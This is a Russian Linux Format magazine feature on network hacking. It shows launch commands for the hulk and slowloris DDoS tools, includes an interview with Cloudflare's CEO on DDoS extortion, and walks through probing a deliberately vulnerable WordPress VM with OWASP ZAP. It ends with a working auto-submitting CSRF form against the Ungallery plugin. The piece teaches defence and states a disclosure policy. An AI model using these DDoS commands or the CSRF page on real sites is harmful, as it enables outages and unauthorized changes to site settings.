По­сколь­ку боль­шин­ст­во со­вре­мен­ных сер­ве­ров име­ют вы­со­кую про­пу­ск­ную спо­соб­ность, мощ­ные CPU и боль­шое ко­ли­че­­ст­во па­мя­ти, как пра­ви­ло, их не очень-то пе­ре­гру­зишь толь­ко с по­мо­щью до­машнего ши­ро­ко­по­лосно­го со­еди­не­ния. Что­бы до­бить­ся это­го, ата­кую­щие час­то ис­поль­зу­ют несколь­ко ком­пь­ю­те­ров для од­но­вре­мен­ной ата­ки на цель. В слу­чае хак­ти­ви­стов это де­ла­ется груп­пой со­чув­ст­вую­щих; в слу­чае пре­ступ­ных эле­мен­тов, это час­то де­ла­ет­ся ботнета­ми.
 +
 +
Есть мно­же­ст­во ин­ст­ру­мен­тов, спо­соб­ных по­мочь вам про­вес­ти тест на DDOS. Лю­би­мей­ший ин­ст­ру­мент Anonimous – High Orbit Ion Cannon, по­сколь­ку он прост для неис­ку­шен­ных поль­зо­ва­те­лей. Од­на­ко мы рас­смот­рим hulk. Его мож­но най­ти на http://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html. Что­бы за­пустить hulk, про­сто рас­па­куй­те его и ско­ман­дуй­те:
 +
 +
unzip hulk zip
 +
 +
python hulk py http://<site>
 +
 +
Что­бы про­тес­ти­ро­вать его, мож­но ско­рень­ко на­стро­ить сер­вер HTTP с по­мо­щью
 +
 +
python -m SimpleHTTPServer
 +
 +
и за­тем ата­ко­вать его ко­ман­дой
 +
 +
python hulk.py http://<ip address>:8000
 +
 +
Мы об­на­ру­жи­ли, что это вполне эф­фек­тив­но об­ру­ши­ва­ет сайт. Но есть оче­вид­ная разница ме­ж­ду об­ру­шением неболь­шо­го web-сер­ве­ра на Python и вы­би­вание со­лид­но­го сер­ве­ра Apache в ре­жим оф­флайн. Hulk про­сто пы­та­ет­ся за­ки­дать ма­ши­ну за­про­са­ми. Те­перь мы рас­смот­рим дру­гой ин­ст­ру­мент, бо­лее ра­зум­ный. Slowlories (он есть на http://ha.ckers.org/slowloris/ или на DVD) ра­бо­та­ет, пы­та­ясь удер­жать как мож­но боль­ше со­единений от­кры­ты­ми, с це­лью ис­чер­пать ре­сур­сы сер­ве­ра. Это тре­бу­ет на­мно­го мень­шей по­ло­сы ве­щания, чем ата­ка гру­бой си­лы в сти­ле hulk, од­на­ко не все сер­вер­ное ПО яв­ля­ет­ся уяз­ви­мым. Что­бы за­пустить slowlories, про­сто сде­лай­те файл ис­пол­няе­мым и за­тем вы­зо­ви­те его с по­мо­щью:
 +
 +
chmode a+x slowlories.pl
 +
 +
./slowris.pl -dns <site>
 +
 +
И сно­ва наш сер­вер на Python сдал­ся мгно­вен­но.
 +
 +
===За­щи­щай­тесь===
 +
 +
За­щи­та от DDoS-ата­ки за­клю­ча­ет­ся в миними­за­ции ущер­ба от ка­ж­до­го вре­до­носно­го па­ке­та. Дру­ги­ми сло­ва­ми, на­до оста­но­вить как мож­но боль­ше та­ких па­ке­тов, как толь­ко они поя­вят­ся в ва­шей се­ти. Для это­го ну­жен бранд­мау­эр и умение его на­стро­ить, что­бы он оп­ре­де­лял и от­бра­сы­вал со­от­вет­ст­вую­щие па­ке­ты.
 +
 +
Как имен­но вы это сде­лае­те, за­ви­сит от бранд­мау­эра, и под­хо­дя­щие пра­ви­ла бу­дут по­сто­ян­но ме­нять­ся в веч­ной охо­те кош­ки за мы­шью, когда ата­кую­щий бу­дет ме­нять свои па­ке­ты, что­бы обой­ти ваш бранд­мау­эр. Од­на­ко мы ска­жем вот что: уз­най­те, как за­щи­тить се­бя, до то­го, как под­вергнетесь ата­ке! Про­буй­те все­воз­мож­ные пред­ла­гае­мые ин­ст­ру­мен­ты DDoS и прак­ти­куй­тесь в ис­кусст­ве их бло­ки­ро­вать, по­то­му что вряд ли вам по­нра­вит­ся учить­ся это­му по­сле то­го, как ваш сайт рухнет. Ра­бо­та с ин­ст­ру­мен­та­ми DDoS – так­же от­лич­ный спо­соб уз­нать, как бу­дет се­бя вес­ти ваш сайт под пиковой на­груз­кой.
 +
 +
В по­ряд­ке аль­тер­на­ти­вы, мож­но по­мес­тить свой сер­вер в сеть, спо­соб­ную по­за­бо­тить­ся о нем вме­сто вас. Та­кие про­вай­де­ры, как CloudFlare, по­мес­тят ваш сер­вер за свой бранд­мау­эр (вир­ту­аль­но, вам не нуж­но за­но­во со­еди­нять­ся с сер­ве­ром). А зна­чит, вам не при­дет­ся бес­по­ко­ить­ся о тон­ко­стях на­стой­ки бранд­мау­эра.
 +
 +
> Ло­ри мед­лен­ные [Slow lories] — тип при­ма­тов, оби­та­ю­щих в Юж­ной и Юго-Вос­точ­­ной Азии. Ес­ли хо­ти­те уз­нать, как они вы­гля­дят, про­сто от­крой­те файл Perl в тек­сто­вом ре­дак­то­ре.
 +
 +
<h1>«Ряд крупней­ших из на­блю­дае­мых атак – по су­ти, вы­мо­га­тель­ст­во он­лайн»</h1>
 +
 +
<h2>Из­ра­иль­тяне и па­ле­стин­цы со­глас­ны в од­ном: в вы­бо­ре за­щитника от DDoS-атак. И вот мы встре­ти­лись с Мэ­тью Прин­сом, ру­ко­во­ди­те­лем и со­уч­ре­ди­те­лем CloudFlare, что­бы вы­яснить, как же он пы­та­ет­ся опережать он­лайн-злоумышленников.</h2>
 +
 +
'''Linux Format:''' Вы за­ме­ча­ли, что гео­гра­фия он­лайн-атак со вре­менем ме­ня­ет­ся?
 +
[[Файл:LXF170.feat_hackleweb.m_fmt.png | right  |thumb|300px|  ]]
 +
'''Мэ­тью Принс''' [Matthew Prince]: Мы с мо­им со­уч­ре­ди­те­лем на­ча­ли ра­бо­тать над про­бле­ма­ми се­те­вой безо­пас­но­сти в 2003 го­ду, за­пустив про­ект Honey Pot. Це­лью бы­ло от­сле­жи­вать он­лай­но­вые мо­шенниче­­ст­ва с кре­дит­ны­ми кар­та­ми, и в пер­вую оче­редь мы от­сле­жи­ва­ли, как спа­ме­ры кра­дут ад­ре­са элек­трон­ной поч­ты с сай­тов. В те вре­ме­на луч­шим спо­со­бом для пло­хих парней сде­лать день­ги он­лайн бы­ло стать спа­ме­ром или тру­дить­ся на ниве спа­ма. Мне ка­жет­ся, эта си­туа­ция ме­ня­ет­ся. Эта сфе­ра все еще весь­ма при­быль­на, но уже не так, как рань­ше. В спа­ме есть од­на ин­те­рес­ная вещь: что­бы их не об­на­ру­жи­ли, спа­ме­ры ста­ли ис­поль­зо­вать ре­сур­сы соз­да­те­лей ви­ру­сов [ком­пь­ю­те­ры, ко­то­рые бы­ли ча­стью ботнета] для сво­их рас­сы­лок. По ме­ре то­го, как с го­да­ми улуч­ша­лись фильт­ры спа­ма и спам ста­но­вил­ся менее при­быль­ным, мы уви­де­ли, как те же са­мые ре­сур­сы ботнета ста­ли ис­поль­зо­вать­ся для ря­да дру­гих атак. Та­ким об­ра­зом, по су­ти мы сей­час име­ем де­ло с той же про­бле­мой, что и в 2003-м: име­ют­ся за­ра­жен­ные ма­ши­ны, и они ис­поль­зу­ют­ся, что­бы соз­дать еще боль­шие про­бле­мы. В 2003-м это был спам, в 2012-м стал DDoS. Од­на­ко ре­сур­сы, ко­то­ры­ми он­лайн-зло­умыш­ленники поль­зу­ют­ся для за­пуска ата­ки, по­следние 10 лет оста­ют­ся все те­ми же.
 +
 +
'''LXF''': В чем са­мая боль­шая уг­ро­за для он­лайн-бизнеса?
 +
 +
'''МП''': Мне ка­жет­ся, очень силь­но вы­росло как ко­ли­че­­ст­во атак [DDoS], так и их раз­мер. Мы на­блю­да­ем ре­гу­ляр­ные ата­ки, пре­вы­шаю­щие 50 или 60 ГБ/с, ко­то­рым под­вер­га­ет­ся на­ша сеть. У нас круп­ная и мощ­ная сеть, и мы справ­ля­ем­ся с ата­ка­ми в несколь­ко со­тен ГБ, но, знае­те ли, 50 или 60 ги­гов – это боль­ше, чем мо­гут от­пра­вить са­мые круп­ные хостинг-про­вай­де­ры. Я не знаю ни од­но­го бан­ка с по­доб­ным тра­фи­ком. С этим труд­но спра­вить­ся, по­то­му что немно­го най­дет­ся ре­сур­сов обо­ру­до­вания, ко­то­рые мож­но бы­ло бы за­дей­ст­во­вать, что­бы пре­кра­тить та­кую ата­ку. Не­важ­но, круп­ное у вас пред­при­ятие или мел­кое, за­ра­ба­ты­ваю­щее он­лайн, я по­ла­гаю, что мас­штаб и объ­ем ныне на­блю­дае­мых DDoS-атак вну­ша­ет серь­ез­ные опа­сения для мно­же­ст­ва пред­при­ятий.
 +
 +
'''LXF''': Вы ис­сле­дуе­те при­чи­ны этих атак?
 +
 +
'''МП''': Мы не осо­бо тра­тим вре­мя на вы­яснение при­чин и то­го, кто за этим сто­ит, хо­тя, конеч­но, по­лу­ча­ем ин­фор­ма­цию от кли­ен­тов на­счет то­го, что, по их мнению, по­слу­жи­ло мо­ти­вом; и мо­ти­вы очень раз­ные. Мы ви­де­ли ата­ки по ком­мер­че­­ским со­об­ра­жениям. Бы­ва­ют слу­чаи, когда ата­ка за­ка­за­на кон­ку­рен­том. Ряд крупней­ших из на­блю­да­емых атак – по су­ти, вы­мо­га­тель­ст­во он­лайн, когда некий зло­умыш­ленник от­прав­ля­ет элек­трон­ной по­чтой на среднего (обыч­но) раз­ме­ра сайт e-commerce со­об­щение при­мер­но та­ко­го со­дер­жания: «ли­бо вы пла­ти­те нам эн­ную сум­му, ли­бо мы пе­ре­кры­ва­ем вам доступ в Ин­тернет». Ко­ли­че­­ст­во по­доб­ных атак рас­тет по­сто­ян­но.
 +
 +
К нам об­ра­щал­ся че­чен­ский но­во­ст­ной сайт, ата­ко­ван­ный россий­ски­ми пра­ви­тель­ст­вен­ны­ми уч­ре­ж­дения­ми или кем-то, со­чув­ст­вую­щим россий­ским пра­ви­тель­ст­вен­ным уч­ре­ж­дениям. У нас есть кли­ен­ты с обе­их сто­рон ближнево­сточ­но­го кон­флик­та. На­ши­ми услу­га­ми поль­зу­ют­ся из­ра­иль­ские, пале­стин­ские и еги­пет­ские сай­ты – на мно­гие из них со­вер­ша­лись мас­штаб­ные ата­ки, и все с по­ли­ти­че­­ской по­до­п­ле­кой. WikiLeaks так­же поль­зо­ва­лась [CloudFlare], для пре­кра­щения мас­штаб­ных атак от­ка­за в об­слу­жи­вании. Хо­тя ата­ки хак­ти­ви­стов наи­бо­лее по­пу­ляр­ны в прес­се, в основ­ном они не са­мые круп­но­мас­штаб­ные. Вы­яс­ня­ет­ся, что са­мые круп­ные ата­ки име­ют оп­ре­де­лен­ную пра­ви­тель­ст­вен­ную под­держ­ку – вот те бы­ва­ют дей­ст­ви­тель­но круп­ны­ми. Или те, что яв­ля­ют­ся он­лайн-вы­мо­га­тель­ст­вом. Мы ви­де­ли ата­ки на сай­ты эс­корт-услуг, когда ряд тру­жениц сек­са ре­шил из­ба­вить­ся от су­тенеров, а су­тенеры ста­ли их пре­сле­до­вать. В прин­ци­пе, лю­бой, у ко­го есть на вас зуб и ре­сур­сы, что­бы доста­вить вам непри­ят­но­сти, мо­жет в на­ше вре­мя ор­ганизо­вать до­воль­но со­лид­ную ата­ку, спо­соб­ную вы­ши­бить оф­флайн да­же круп­ную ор­ганиза­цию. Пол­ную вер­сию ин­тер­вью см. на www.tuxradar.com/content/mpivew. |

Текущая версия на 12:25, 15 ноября 2018

Содержание

[править] ВЗЛОМ СЕТИ

Во­ров­ст­во па­ро­лей >>, Взлом WordPress >> Экс­плуа­та­ция уяз­ви­мо­стей » Ата­ки DDoS.

При­сое­ди­ним­ся к Бе­ну Эве­рар­ду в его пу­те­ше­ст­вии на тем­ную сто­ро­ну*.

Ис­кусст­во мани­пулиро­вать чужим ком­пьютером, что­бы де­лать все что угод­но без раз­ре­шения... одни на­зы­ва­ют его ха­кер­ст­вом, д­ругие — взло­мом или тес­ти­ро­ванием воз­мож­но­сти проник­но­вения в сис­те­му. Пра­ви­тель­ст­ва, бизнес­ме­ны, дис­си­ден­ты, ску­чаю­щие ком­пь­ю­тер­ные про­фес­сио­на­лы и пре­ступники ата­ку­ют друг дру­га — и обыч­ных поль­зо­ва­те­лей — еже­днев­но.

Ха­кер­ст­во бы­ва­ет раз­ное, но мы рас­смот­рим здесь се­те­вые ата­ки, по­сколь­ку имен­но они боль­ше все­го за­тра­ги­ва­ют обыч­ных лю­дей. Не­ко­то­рые из этих атак, на­при­мер, мсти­тель­ные ата­ки груп­пы Anonymous, ста­но­ви­лись ши­ро­ко из­вест­ны, по­сколь­ку пе­ре­во­ди­ли сай­ты в ре­жим оф­флайн или до­бав­ля­ли граф­фи­ти на глав­ные страницы сай­тов. О дру­гих со­об­ща­ют очень ред­ко, хо­тя они про­ис­хо­дят что ни день, при­но­ся пре­ступникам со­лид­ные сум­мы.

Ес­ли у вас есть сайт, вы, без со­мнения, на­блю­да­ли мно­же­ст­во по­пы­ток ата­ки по за­пи­сям в сво­ем жур­на­ле. Бу­ду­чи поль­зо­ва­те­лем, вы, ско­рее все­го, на­блю­да­ли ре­зуль­та­ты этих атак в ви­де спа­ма (помните эти зав­ле­ка­тель­ные ссыл­ки?); а мо­жет, вам силь­но не по­вез­ло, и вы ли­ши­лись некой лич­ной ин­фор­ма­ции, когда был ата­ко­ван сер­вер.

В лю­бом слу­чае, мы все жи­вем в тес­но связан­ном ми­ре, в ко­то­ром все боль­ше и боль­ше на­ших цен­но­стей хра­нят­ся в циф­ро­вых хранили­щах, а не в фи­зи­че­­ских сей­фах. Ос­та­ет­ся или про­сто устроиться по­удобнее и ждать, когда пра­ви­тель­ст­во и про­вай­де­ры нас за­щи­тят, или са­мим осоз­нать все воз­мож­ные уг­ро­зы и за­нять­ся са­мо­за­щи­той.

Мы по­ка­жем вам не­ко­то­рые ха­кер­ские ин­ст­ру­мен­ты из­нут­ри, по­то­му что за­щи­тить се­бя мож­но, толь­ко разобравшись, от че­го за­щи­щаешь­ся.

Мы рас­смот­рим че­ты­ре раз­ных ти­па атак – от­каз в об­слу­жи­вании (DDoS), «по­сре­дник [man-in-the-middle]», меж­сай­то­вый скрип­тинг и ата­ки внедрения – и по­ка­жем, как имен­но их ис­поль­зу­ют пре­ступники в на­ше вре­мя и что на­до сде­лать, что­бы вы са­ми или ваш сайт не па­ли их жерт­ва­ми.

[править] *Пра­во­вое обосно­вание

В раз­ных стра­нах за­ко­ны о ха­кер­ст­ве раз­ные, и мы не мо­жем дать кон­крет­ных юри­ди­че­­ских со­ве­тов. Но бу­дет обосно­ван­но зая­вить, что при­менение лю­бой из опи­сы­вае­мых здесь тех­но­ло­гий к сай­ту без раз­ре­шения от его вла­дель­ца на та­ко­вое во мно­гих стра­нах яв­ля­ет­ся неза­кон­ным.

Ес­ли вы ра­бо­тае­те в ком­пании или в ор­ганиза­ции, у вас долж­но быть пись­мен­ное раз­ре­шение от со­от­вет­ст­вую­щих долж­но­ст­ных лиц на про­ве­дение ука­зан­ных ме­ро­прия­тий. Так вы за­страхуе­те се­бя от воз­мож­ных про­блем при недо­понимании про­ис­хо­дя­ще­го.

«Мы по­ка­жем вам ха­кер­ские ин­ст­ру­мен­ты из­нут­ри.»

[править] СЕ­ТИ

[править] Взлом WordPress

Ата­ка на web-при­ло­жение.

По ме­ре роста мо­щи HTML5 и ско­ро­сти JavaScript, web-при­ло­жения рас­про­стра­ня­ют­ся все ши­ре. Ubuntu и неко­то­рые дру­гие ди­ст­ри­бу­ти­вы об­ра­ща­ют­ся с ними, как с при­ло­жения­ми пер­вого ряда, а Mozilla соз­да­ет смарт­фон, строя­щий все свои функ­ции имен­но на них. Од­на­ко вме­сте с ними на пе­редний план вы­хо­дят уяз­ви­мо­сти, ко­то­рых рань­ше не бы­ло.

Мы рас­смот­рим данную об­ласть, ис­поль­зуя в ка­че­­ст­ве при­ме­ра WordPress – не по­то­му, что это пло­хое при­ло­жение, а по­то­му, что его по­пу­ляр­ность и спо­соб­ность к рас­ши­рению сде­ла­ли его ми­ше­нью для атак. Ни од­на из опи­сы­вае­мых здесь атак не уникаль­на для этой плат­фор­мы, и они ха­рак­тер­ны для мно­гих web-при­ло­жений, вне за­ви­си­мо­сти от то­го, построены ли они на CMS.

По­сколь­ку мы пред­по­чи­та­ем по­ка­зать, как ра­бо­та­ет ата­ка, а не по­яс­нять ее, мы соз­да­ли вир­ту­аль­ную ма­ши­ну (ВМ), на ко­то­рой ра­бо­та­ет уяз­ви­мая вер­сия WordPress. Она име­ет­ся на дис­ке, и ее мож­но ска­чать с www.linuxformat.com/content/downloads.

Об­за­ве­дясь ею, сле­дуй­те ниже­при­ве­ден­но­му по­ша­го­во­му ру­ко­во­дству по уста­нов­ке. Вам по­на­до­бит­ся VirtualBox; в осталь­ном она ра­бо­та­ет поч­ти на лю­бом ди­ст­ри­бу­ти­ве. Мы ис­поль­зо­ва­ли фор­мат бло­гов в WordPress, что­бы по­ка­зать, как ее взло­мать, так что за­пускай­те ее и при­сту­пай­те.

Как толь­ко вы об­на­ру­жи­те ата­ку, блог так­же со­об­щит вам в под­роб­но­стях, как за­щи­тить­ся, что­бы про­ве­рить, уда­ст­ся ли за­де­лать ды­ры в сис­теме безо­пас­но­сти, пре­ж­де чем дви­гать­ся даль­ше.

[править] За­щи­ти­те се­бя

Ес­ли вы ра­бо­тае­те в web-при­ло­жении, вы про­сто обя­за­ны осоз­на­вать все рис­ки. Уяз­ви­мо­сти мо­гут зай­ти даль­ше са­мо­го при­ло­жения, по­сколь­ку ата­кую­ще­му, воз­мож­но, уда­ст­ся за­хва­тить кон­троль над сер­ве­ром. Ес­ли вы ис­поль­зуе­те го­то­вое ПО (ти­па WordPress), непло­хо за­помнить та­кое пра­ви­ло:

Intrusion Detection Systems [Сис­те­ма Об­на­ру­жения Втор­жения] и Intrusion Prevention Systems [Сис­те­мы Пре­дот­вра­щения Втор­жения] (IDSs и IPSs) по­мо­га­ют снизить ущерб, при­чи­няе­мый ата­кую­щим, од­на­ко не сто­ит счи­тать их эта­ки­ми се­реб­ря­ны­ми пу­ля­ми, спо­соб­ны­ми раз­ре­шить все ва­ши про­бле­мы с безо­пас­но­стью. И не менее важ­но, что­бы у вас бы­ли уста­нов­ле­ны и долж­ным об­ра­зом на­строе­ны SELinux или AppArmour.

Ес­ли вы ис­поль­зуе­те спе­циа­ли­зи­ро­ван­ное web-при­ло­жение, вы долж­ны быть уве­ре­ны, что вам зна­ко­мы раз­ные тех­но­ло­гии, ис­поль­зуе­мые ата­кую­щи­ми. От­лич­ный стар­то­вый пункт – сайт OWASP (Open Source Web Applications Security Project – Про­ект безо­пас­но­сти web-при­ло­жений с от­кры­тым ко­дом), https://www.owasp.org. Ес­ли на ва­шем сай­те хра­нят­ся важ­ные дан­ные, сто­ит по­со­ве­то­вать­ся со спе­циа­ли­стом по по­во­ду обес­пе­чения безо­пас­но­сти их хранения.

[править] По­иск уяз­ви­мо­стей

Как об­на­ру­жить и ис­поль­зо­вать сла­бую сто­ро­ну ва­ше­го сай­та.

Взгля­нув на ВМ LXF Vulnerable Machine, вы мо­же­те лег­ко прий­ти к вы­во­ду, что ис­поль­зо­вать уяз­ви­мо­сти очень лег­ко, зная, где они есть, а вот как их най­ти? Что­бы от­ве­тить на этот во­прос, мы по­ста­ви­ли се­бе за­да­чу най­ти и ис­поль­зо­вать уяз­ви­мо­сти на на­шем сай­те.

Во-пер­вых, мы уста­но­ви­ли ата­кую­щий про­кси. Этот ин­ст­ру­мент пе­ре­хва­ты­ва­ет HTTP-за­про­сы ва­ше­го брау­зе­ра и ис­поль­зу­ет их для соз­дания кар­ты сай­та, ко­то­рый вы про­смат­ри­вае­те. С его по­мо­щью вы мо­же­те по­нять, что же имен­но вы ата­куе­те, да­же ес­ли у вас нет досту­па к ис­ход­но­му ко­ду. Так­же он да­ет вам пред­став­ление об ин­фор­ма­ции, пе­ре­да­вае­мой ме­ж­ду сер­ве­ром и брау­зе­ром.

Мы вы­бра­ли OWASP ZAP (он име­ет­ся на http://code.google.com/p/zaproxy и на DVD) – что­бы при­менить его, про­сто рас­па­куй­те его и за­пусти­те (уста­нав­ли­вать не на­до) с по­мо­щью:

tar zxvf ZAP_2.0.0_Linux.tar.gz

cd ZAP_2.0.0

./zap.sh

Вер­сии 2.0.0 тре­бу­ет­ся Java 1.7 или вы­ше. Ес­ли у вас бо­лее ран­няя вер­сия (как по умол­чанию в Ubuntu 12.04), вы мо­же­те ис­поль­зо­вать или ZAP вер­сии 1.4.1, или са­мо­стоя­тель­но най­ти вер­сию Java по­но­вее. На на­шей ма­шине с Precise Pangolin мы уста­но­ви­ли па­кет openjdk-7-jre и из­менили конеч­ную стро­ку с zap.sh на

exec /usr/lib/jvm/java-7-openjdk-i386/bin/java ${JMEM}-XX:PermSize=256M -jar “{BASEDIR}/zap.jar” org.zaproxy.zap.ZAP $*

Эта ко­ман­да за­пустит ра­бо­ту про­кси на пор­те 8080, и вам нуж­но на­стро­ить свой брау­зер, что­бы он про­пускал свои дан­ные че­рез него. В Firefox это де­ла­ет­ся в Edit > Preferences, за­тем на­до пе­рей­ти в Advanced > Network > Settings и из­менить пе­ре­клю­ча­тель на Manual Proxy Configuration с HTTP Proxy в ка­че­­ст­ве localhost и Port 8080.

Те­перь вы долж­ны уви­деть од­ну или несколь­ко за­пи­сей Zap для ка­ж­дой страницы, на ко­то­рую вы за­хо­ди­те. Zap так­же по­пы­та­ет­ся по­мочь вам, от­ме­чая все пунк­ты, ко­то­рые он со­чтет уяз­ви­мы­ми, цвет­ным флаж­ком – от жел­то­го до крас­но­го, в за­ви­си­мо­сти от серь­ез­но­сти про­бле­мы (по его мнению). Флаж­ки го­лу­бо­го цве­та про­сто от­ме­ча­ют ин­фор­ма­цию. Од­на­ко эту гра­да­цию на­до принимать не без скеп­си­са. Мно­гие из от­ме­чен­ных флаж­ка­ми страниц во­все не яв­ля­ют­ся уяз­ви­мы­ми, а мно­гие, на­обо­рот, про­пуска­ют­ся (это обыч­ная про­бле­ма со все­ми ав­то­ма­ти­че­­ски­­ми сканера­ми безо­пас­но­сти, ко­то­рые мы встре­ча­ли).

На­стро­ив про­грам­му, мы мо­жем на­чать ата­ку. Пер­вая фа­за лю­бо­го тес­та на проник­но­вение – это сбор ин­фор­ма­ции. В ZAP есть ин­ст­ру­мен­ты для ав­то­ма­ти­че­­ско­­го сканиро­вания сай­та, но мы пред­по­чи­та­ем на­чать с руч­но­го сканиро­вания. Это оз­на­ча­ет про­смотр сай­та че­рез ваш web-брау­зер, в про­цес­се ко­то­ро­го ZAP со­став­ля­ет ка­та­лог. Чем под­робнее вы рас­смат­ри­вае­те сайт, тем боль­ше ин­фор­ма­ции вы по­лу­чи­те.

Про­дви­га­ясь по при­ло­жению, мы ищем век­то­ры ата­ки. В основ­ном это спо­соб пе­ре­да­чи ин­фор­ма­ции на сайт. В HTTP это про­ис­хо­дит в двух ви­дах: па­ра­мет­ры, пе­ре­да­вае­мые по за­про­сам GET (это би­ты, ко­то­рые сле­ду­ют за во­про­си­тель­ным зна­ком в URL), и за­про­сы POST (их труднее уви­деть без та­ко­го про­кси, как ZAP, но они пе­ре­чис­ле­ны во вклад­ке Requests). Лю­бые их них мож­но из­менить так, что­бы они от­прав­ля­ли лю­бую нуж­ную нам ин­фор­ма­цию. Как вы ви­ди­те на при­ме­ре атак на блог WordPress, хо­ро­шо про­ду­ман­ные и ор­ганизо­ван­ные вре­до­носные дан­ные мо­гут иногда про­скольз­нуть на сайт, ес­ли он не про­ве­ря­ет вхо­дя­щие дан­ные долж­ным об­ра­зом.

По­лу­чив пол­ное пред­став­ление о сво­ей жерт­ве, мож­но при­сту­пать к по­ис­ку мес­та для на­шей ата­ки. Да­же на та­ком про­стом сай­те WordPress, как наш, есть сотни век­то­ров, ко­то­рые мы мо­жем рас­смот­реть, но боль­шин­ст­во не бу­дут уяз­ви­мы. Ча­стью ис­кусст­ва взло­ма сай­тов яв­ля­ет­ся осоз­нание то­го, на ка­ких век­то­рах сто­ит скон­цен­три­ро­вать­ся. На­при­мер, мож­но бы по­про­бо­вать ата­ко­вать па­ра­метр page_id, имею­щий­ся на боль­шин­ст­ве страниц, но на WordPress он на­столь­ко ва­жен, что явно под­вер­гал­ся тща­тельней­ше­му рас­смот­рению. Мо­жет, он и уяз­вим, но ско­рее все­го сла­дить с ним не так-то про­сто. Луч­ше по­ис­кать сла­бо­сти в менее ис­поль­зуе­мых об­лас­тях. Ис­то­ри­че­­ски сло­жи­лось, что до­полнения всегда бы­ли ку­да бо­лее пло­до­твор­ной поч­вой для ата­кую­ще­го, чем основ­ное при­ло­жение.

[править] Под­дел­ка меж­сай­то­вых за­про­сов

Мы об­ра­ти­ли внимание, что ZAP пе­ре­чис­лил ряд страниц, уяз­ви­мых для под­дел­ки меж­сай­то­вых за­про­сов (Cross Site Request Forgery, CSRF), во вклад­ке Alerts. Это спо­соб ата­ки, при ко­то­ром вы об­ман­ным пу­тем за­став­ляе­те web-при­ло­жение при­нять вхо­дя­щие дан­ные, соз­да­вая дру­гой сайт, ко­то­рый ими­ти­ру­ет HTTP-за­прос web-при­ло­жения. Ес­ли по­сле это­го ау­тен­ти­фи­ци­ро­ван­ный поль­зо­ва­тель от­кро­ет ваш вре­до­носный сайт, его брау­зер от­пра­вит его ау­тен­ти­фи­ка­ци­он­ные cookie, бла­го­да­ря ко­то­рым ваш вре­до­носный за­прос HTTP бу­дет вы­полнен поль­зо­ва­те­лем (не пе­ре­жи­вай­те, ес­ли это все по­ка­за­лось вам тем­ным: все станет яс­но по ме­ре то­го, как мы бу­дем раз­би­рать суть ата­ки).

Обыч­но WordPress оста­нав­ли­ва­ет этот вид ата­ки с по­мо­щью “nonce”. Это слу­чай­ным об­ра­зом вы­бран­ное чис­ло, на­прав­ляе­мое в брау­зер при соз­дании фор­мы. Ес­ли с дан­ны­ми фор­мы на­зад на сер­вер пе­ре­да­ет­ся то же чис­ло, сер­вер зна­ет, что фор­ма пред­став­ле­на поль­зо­ва­те­лем на сай­те. Ес­ли нет – сер­вер понима­ет, что фор­ма пред­став­ле­на дру­гим сай­том, и про­сто сбра­сы­ва­ет дан­ные. Од­на­ко мы за­ме­ти­ли, что на од­ной из страниц нет nonce – в про­стом за­про­се HTTP POST, раз­ре­шен­ном с по­мо­щью cookie. А зна­чит, лю­бая фор­ма HTML (неза­ви­си­мо от то­го, на ка­ком сай­те она бы­ла) мо­жет пред­ста­вить дан­ные этой час­ти при­ло­жения. Вы­гля­де­ло иде­аль­ной це­лью для CSRF-ата­ки. Об­су­ж­дае­мая страница бы­ла на­строй­ка­ми для Ungallery (за­прос см. на рис. 1).

Хит­рость те­перь за­клю­ча­лась в соз­дании но­вой страницы, ко­то­рая бы генери­ро­ва­ла иден­тич­ный за­прос HTTP. Это был за­прос POST, и имен­но его про­ще все­го под­де­лать с по­мо­щью фор­мы HTML. Мы соз­да­ли но­вый файл, со­дер­жа­щий сле­дую­щее:

<html>

<head>

<title>Test site for csrf in Ungallery</title>

</head>

<body>

<form action=”http://site-url/wp-admin/options-general.php?page=ungallerysettings” method=”POST”>

<input type=”hidden” name=”mt_submit_hidden” value=”Y”>

<input type=”hidden” name=”images_path” value=”%2Froot%2Fimages%2F”>

<input type=”hidden” name=”URI” value=”http%3A%2F%2F 192.168.133.143%2F”>

<input type=”hidden” name=”gallery” value=”%3Fpage_id%3D9”>

<input type=”hidden” name=”cache_dir” value=”%2Fvar%2F www%2Fwordpress%2Fwp-content%2Fcache%2F”>

<input type=”hidden” name=”columns” value=”5”>

<input type=”hidden” name=”thumbnail” value=”190”>

<input type=”hidden” name=”browse_view” value=”440”>

<input type=”hidden” name=”hidden” value=”hidden”>

<input type=”hidden” name=”gallery2” value=””>

<input type=”hidden” name=”images2_path” value=””>

<input type=”hidden” name=”gallery3” value=””>

<input type=”hidden” name=”images3_path” value=””>

<input type=”hidden” name=”gallery4” value=””>

<input type=”hidden” name=”images4_path” value=””>

<input type=”hidden” name=”gallery5” value=””>

<input type=”hidden” name=”images5_path” value=””>

<input type=”hidden” name=”gallery6” value=””>

<input type=”hidden” name=”images6_path” value=””>

<input type=”hidden” name=”Submit” value=”Save+Changes”>

</form>

<script>document.forms[0].submit();</script>

</body>

</head>

Как вы мо­же­те ви­деть, это но­вая фор­ма HTML, ко­то­рая пред­став­ля­ет дан­ные на страницу на­стро­ек Ungallery. По­сколь­ку здесь нет nonce, Ungallery ав­то­ма­ти­че­­ски при­мет его, ес­ли бу­дет иметь со­от­вет­ст­вую­щий cookie. Ес­ли нек­то с пра­ва­ми ад­минист­ра­то­ра от­кро­ет файл, он мо­жет из­менить на­строй­ки. При на­стоя­щей ата­ке это мож­но сде­лать, от­пра­вив по элек­трон­ной поч­те зав­ле­ка­тель­ную ссыл­ку ад­минист­ра­то­ру или оста­вив где-нибудь в об­ще­ст­вен­ном мес­те флэш­ку USB со скрип­том autorun. Конеч­но, это не са­мая вре­до­носная ата­ка, но ею мож­но восполь­зо­вать­ся, что­бы сде­лать от­кры­ты­ми изо­бра­жения, ко­то­рые долж­ны бы­ли хранит­ся в сек­ре­те.

Ис­то­рия на этом, конеч­но же, не за­кан­чи­ва­ет­ся. Мы в Linux Format при­дер­жи­ва­ем­ся по­ли­ти­ки от­вет­ст­вен­но­го раз­гла­шения. Это оз­на­ча­ет, что хо­тя мы и ра­ды пуб­ли­ко­вать под­роб­ную ин­фор­ма­цию об уяз­ви­мо­стях, все же сна­ча­ла мы обя­за­тель­но из­ве­ща­ем раз­ра­бот­чи­ка.

